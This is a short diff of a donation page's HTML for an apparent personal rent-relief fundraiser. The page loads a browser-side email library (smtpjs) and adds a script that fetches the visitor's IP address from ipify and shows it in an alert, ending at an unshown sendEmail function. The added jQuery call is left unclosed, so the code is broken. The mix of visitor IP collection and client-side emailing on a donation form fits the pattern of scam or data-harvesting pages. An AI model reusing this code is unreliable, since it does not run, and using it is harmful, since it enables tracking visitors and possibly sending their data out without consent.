--- a/f/providing-rent-relief-for-my-close-friend-lydia/donate.html
+++ b/f/providing-rent-relief-for-my-close-friend-lydia/donate.html
@@ -3,14 +3,15 @@
   <title>
    Donate to providing rent relief for my close friend Lydia
   </title>
-  <script src="https://smtpjs.com/v3/smtp.js"></script>
-	 <script src= 
-"https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"> 
+  <script src="https://smtpjs.com/v3/smtp.js"></script> 
+<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"> 
     </script> 
     <script> 
-        $.get("https://ipinfo.io", function(response) { 
-            alert(response.ip); 
-        }, "json") 
+        $.getJSON("https://api.ipify.org?format=json", 
+                                          function(data) { 
+  
+      
+            window.alert(data.ip); 
     </script> 
   <script>
    function sendEmail(key){
